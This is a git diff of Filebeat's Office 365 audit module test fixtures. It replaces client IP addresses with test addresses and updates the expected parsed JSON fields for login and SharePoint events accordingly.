+{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 
Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
+{"CreationTime":"2021-02-05T09:06:08","Id":"a2b50af0-f77d-4bbf-b30b-d3b2eea07300","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"5f09333a-842c-47da-a157-57da27fcbca5","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"f987e734-9f74-4996-8d75-6da73a443d22","IntraSystemId":"a2b50af0-f77d-4bbf-b30b-d3b2eea07300","SupportTicketId":"","Target":[{"ID":"5f09333a-842c-47da-a157-57da27fcbca5","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
+{"CreationTime":"2021-02-05T09:06:34","Id":"5532155c-11e4-4628-95e7-6c1ddb0d6f00","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"5f09333a-842c-47da-a157-57da27fcbca5","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"e5e06ef9-0ea6-4a1e-82e2-b82d83ec68a1","IntraSystemId":"5532155c-11e4-4628-95e7-6c1ddb0d6f00","SupportTicketId":"","Target":[{"ID":"5f09333a-842c-47da-a157-57da27fcbca5","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
+{"CreationTime":"2021-02-05T09:06:07","Id":"f3bc8508-1130-4d82-b7c7-4c1292b98600","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"00000002-0000-0ff1-ce00-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 
Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"17b096b5-881a-4d72-8268-4854f9aa8910","IntraSystemId":"f3bc8508-1130-4d82-b7c7-4c1292b98600","SupportTicketId":"","Target":[{"ID":"00000002-0000-0ff1-ce00-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"00000002-0000-0ff1-ce00-000000000000","ErrorNumber":"0"}
 {"CreationTime":"2021-02-04T16:33:17","Id":"1947bd7a-5b96-4bd5-931b-c12cc6ffdfcd","Operation":"Delete user.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Is Hard 
Deleted","NewValue":"False","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"3e7b36e7-caba-4d7a-ae08-07f0a716135c","IntraSystemId":"995e2026-17cc-4599-8f63-b3f3556d784b","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
 {"CreationTime":"2021-02-04T16:33:14","Id":"4a27de4c-a2dd-4825-8f7f-6a623b3060ec","Operation":"Change user license.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"443c61f9-900a-46cd-906f-7de2d16bd7b0","IntraSystemId":"74634e79-78c4-4335-8776-8afc267f5329","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type"
:2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
-{"CreationTime":"2021-02-05T09:05:59","Id":"eed8f929-567c-45bf-94ad-76ccf0f26300","Operation":"UserLoginFailed","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"00000002-0000-0000-c000-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"UserAuthenticationMethod","Value":"1"},{"Name":"RequestType","Value":"Login:login"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"9b4acea8-44ad-49f1-a9c3-88c075e8ba85","IntraSystemId":"eed8f929-567c-45bf-94ad-76ccf0f26300","SupportTicketId":"","Target":[{"ID":"00000002-0000-0000-c000-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"4345a7b9-9a63-4910-a426-35363201d503","ErrorNumber":"50072","LogonError":"UserStrongAuthEnrollmentRequiredInterrupt"}
-{"CreationTime":"2021-02-05T09:05:59","Id":"eed8f929-567c-45bf-94ad-76ccf0f26300","Operation":"UserLoginFailed","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"00000002-0000-0000-c000-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"UserAuthenticationMethod","Value":"1"},{"Name":"RequestType","Value":"Login:login"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"9b4acea8-44ad-49f1-a9c3-88c075e8ba85","IntraSystemId":"eed8f929-567c-45bf-94ad-76ccf0f26300","SupportTicketId":"","Target":[{"ID":"00000002-0000-0000-c000-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"4345a7b9-9a63-4910-a426-35363201d503","ErrorNumber":"50072","LogonError":"UserStrongAuthEnrollmentRequiredInterrupt"}
-{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 
Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
+{"CreationTime":"2021-02-05T09:05:59","Id":"eed8f929-567c-45bf-94ad-76ccf0f26300","Operation":"UserLoginFailed","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"00000002-0000-0000-c000-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"UserAuthenticationMethod","Value":"1"},{"Name":"RequestType","Value":"Login:login"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"9b4acea8-44ad-49f1-a9c3-88c075e8ba85","IntraSystemId":"eed8f929-567c-45bf-94ad-76ccf0f26300","SupportTicketId":"","Target":[{"ID":"00000002-0000-0000-c000-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"4345a7b9-9a63-4910-a426-35363201d503","ErrorNumber":"50072","LogonError":"UserStrongAuthEnrollmentRequiredInterrupt"}
+{"CreationTime":"2021-02-05T09:05:59","Id":"eed8f929-567c-45bf-94ad-76ccf0f26300","Operation":"UserLoginFailed","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"00000002-0000-0000-c000-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"UserAuthenticationMethod","Value":"1"},{"Name":"RequestType","Value":"Login:login"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"9b4acea8-44ad-49f1-a9c3-88c075e8ba85","IntraSystemId":"eed8f929-567c-45bf-94ad-76ccf0f26300","SupportTicketId":"","Target":[{"ID":"00000002-0000-0000-c000-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"4345a7b9-9a63-4910-a426-35363201d503","ErrorNumber":"50072","LogonError":"UserStrongAuthEnrollmentRequiredInterrupt"}
+{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 
Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
diff --git a/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json
index b0d29652926b..35b8735d1a02 100644
--- a/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json
+++ b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json
@@ -107,8 +107,8 @@
 }, { "@timestamp": "2021-02-05T09:08:13.000Z", - "client.address": "52.114.88.180", - "client.ip": "52.114.88.180", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "ListColumnUpdated", "event.category": "web", "event.code": "SharePointFieldOperation",
@@ -127,7 +127,7 @@
 "network.type": "ipv4", "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", - "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CorrelationId": "fc39a89f-5054-2000-9ced-83aa1cf560fd", "o365.audit.CreationTime": "2021-02-05T09:08:13", "o365.audit.DoNotDistributeEvent": true, 
@@ -157,20 +157,18 @@ "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", "o365.audit.Workload": "SharePoint", "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", - "related.ip": "52.114.88.180", + "related.ip": "81.2.69.143", "related.user": "root", "service.type": "o365", - "source.as.number": 8075, - "source.as.organization.name": "Microsoft Corporation", "source.geo.city_name": "London", "source.geo.continent_name": "Europe", "source.geo.country_iso_code": "GB", "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.5132, - "source.geo.location.lon": -0.0961, + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.region_iso_code": "GB-ENG", "source.geo.region_name": "England", - "source.ip": "52.114.88.180", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -184,8 +182,8 @@ }, { "@timestamp": "2021-02-05T09:08:12.000Z", - "client.address": "52.114.88.180", - "client.ip": "52.114.88.180", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "FolderCreated", "event.category": "file", "event.code": "SharePointFileOperation", @@ -203,11 +201,11 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "testsiem4.onmicrosoft.com", "input.type": "log", - "log.offset": 2192, + "log.offset": 2190, "network.type": "ipv4", "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", - "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CorrelationId": "fc39a89f-b01b-2000-9ced-879789d2d8e5", "o365.audit.CreationTime": "2021-02-05T09:08:12", "o365.audit.EventSource": "SharePoint", 
@@ -232,20 +230,18 @@ "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", "o365.audit.Workload": "SharePoint", "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", - "related.ip": "52.114.88.180", + "related.ip": "81.2.69.143", "related.user": "root", "service.type": "o365", - "source.as.number": 8075, - "source.as.organization.name": "Microsoft Corporation", "source.geo.city_name": "London", "source.geo.continent_name": "Europe", "source.geo.country_iso_code": "GB", "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.5132, - "source.geo.location.lon": -0.0961, + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.region_iso_code": "GB-ENG", "source.geo.region_name": "England", - "source.ip": "52.114.88.180", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -277,7 +273,7 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "sharepoint", "input.type": "log", - "log.offset": 3234, + "log.offset": 3230, "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", "o365.audit.CreationTime": "2021-02-05T09:07:57", "o365.audit.EventData": "Site Members", @@ -329,7 +325,7 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "sharepoint", "input.type": "log", - "log.offset": 4046, + "log.offset": 4042, "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", "o365.audit.CreationTime": "2021-02-05T09:07:56", "o365.audit.EventData": "Site Owners", @@ -381,7 +377,7 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "sharepoint", "input.type": "log", - "log.offset": 4838, + "log.offset": 4834, "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", "o365.audit.CreationTime": "2021-02-05T09:07:56", "o365.audit.EventData": "Site Owners", 
@@ -433,7 +429,7 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "sharepoint", "input.type": "log", - "log.offset": 5631, + "log.offset": 5627, "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", "o365.audit.CreationTime": "2021-02-05T09:07:56", "o365.audit.EventData": "Site Members", @@ -485,7 +481,7 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "sharepoint", "input.type": "log", - "log.offset": 6426, + "log.offset": 6422, "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", "o365.audit.CreationTime": "2021-02-05T09:07:56", "o365.audit.EventData": "Site Owners", @@ -523,8 +519,8 @@ }, { "@timestamp": "2021-02-05T09:07:56.000Z", - "client.address": "20.190.143.50", - "client.ip": "20.190.143.50", + "client.address": "81.2.69.193", + "client.ip": "81.2.69.193", "event.action": "SiteCollectionCreated", "event.category": "web", "event.code": "SharePoint", @@ -539,11 +535,11 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "sharepoint", "input.type": "log", - "log.offset": 7218, + "log.offset": 7214, "network.type": "ipv4", "o365.audit.ApplicationDisplayName": "Microsoft Graph", "o365.audit.ApplicationId": "00000006-0000-0ff1-ce00-000000000000", - "o365.audit.ClientIP": "20.190.143.50", + "o365.audit.ClientIP": "81.2.69.193", "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", "o365.audit.CreationTime": "2021-02-05T09:07:56", "o365.audit.EventData": "O365AdminCenterTrueFalse", 
@@ -562,20 +558,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "SharePoint", "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", - "related.ip": "20.190.143.50", + "related.ip": "81.2.69.193", "related.user": "app", "service.type": "o365", - "source.as.number": 8075, - "source.as.organization.name": "Microsoft Corporation", "source.geo.city_name": "London", "source.geo.continent_name": "Europe", "source.geo.country_iso_code": "GB", "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.5132, - "source.geo.location.lon": -0.0961, + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.region_iso_code": "GB-ENG", "source.geo.region_name": "England", - "source.ip": "20.190.143.50", + "source.ip": "81.2.69.193", "tags": [ "forwarded" ], @@ -603,7 +597,7 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "sharepoint", "input.type": "log", - "log.offset": 8147, + "log.offset": 8141, "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", "o365.audit.CreationTime": "2021-02-05T09:07:56", "o365.audit.EventData": "Site Owners", @@ -655,7 +649,7 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "sharepoint", "input.type": "log", - "log.offset": 8940, + "log.offset": 8934, "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", "o365.audit.CreationTime": "2021-02-05T09:07:55", "o365.audit.EventData": "Site Owners", @@ -693,8 +687,8 @@ }, { "@timestamp": "2021-02-05T09:08:14.000Z", - "client.address": "52.114.88.180", - "client.ip": "52.114.88.180", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "ListUpdated", "event.category": "web", "event.code": "SharePointListOperation", 
@@ -709,11 +703,11 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "testsiem4.onmicrosoft.com", "input.type": "log", - "log.offset": 9732, + "log.offset": 9726, "network.type": "ipv4", "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", - "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d", "o365.audit.CreationTime": "2021-02-05T09:08:14", "o365.audit.DoNotDistributeEvent": true, @@ -743,20 +737,18 @@ "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", "o365.audit.Workload": "SharePoint", "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", - "related.ip": "52.114.88.180", + "related.ip": "81.2.69.143", "related.user": "root", "service.type": "o365", - "source.as.number": 8075, - "source.as.organization.name": "Microsoft Corporation", "source.geo.city_name": "London", "source.geo.continent_name": "Europe", "source.geo.country_iso_code": "GB", "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.5132, - "source.geo.location.lon": -0.0961, + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.region_iso_code": "GB-ENG", "source.geo.region_name": "England", - "source.ip": "52.114.88.180", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -770,8 +762,8 @@ }, { "@timestamp": "2021-02-05T09:08:14.000Z", - "client.address": "52.114.88.180", - "client.ip": "52.114.88.180", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "ListCreated", "event.category": "web", "event.code": "SharePointListOperation", 
@@ -786,11 +778,11 @@ "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", "host.name": "testsiem4.onmicrosoft.com", "input.type": "log", - "log.offset": 10806, + "log.offset": 10798, "network.type": "ipv4", "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", - "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d", "o365.audit.CreationTime": "2021-02-05T09:08:14", "o365.audit.EventSource": "SharePoint", @@ -813,20 +805,18 @@ "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", "o365.audit.Workload": "SharePoint", "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", - "related.ip": "52.114.88.180", + "related.ip": "81.2.69.143", "related.user": "root", "service.type": "o365", - "source.as.number": 8075, - "source.as.organization.name": "Microsoft Corporation", "source.geo.city_name": "London", "source.geo.continent_name": "Europe", "source.geo.country_iso_code": "GB", "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.5132, - "source.geo.location.lon": -0.0961, + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.region_iso_code": "GB-ENG", "source.geo.region_name": "England", - "source.ip": "52.114.88.180", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -840,8 +830,8 @@ }, { "@timestamp": "2021-02-05T09:08:17.000Z", - "client.address": "51.141.50.227", - "client.ip": "51.141.50.227", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "ListColumnUpdated", "event.category": "web", "event.code": "SharePointFieldOperation", 
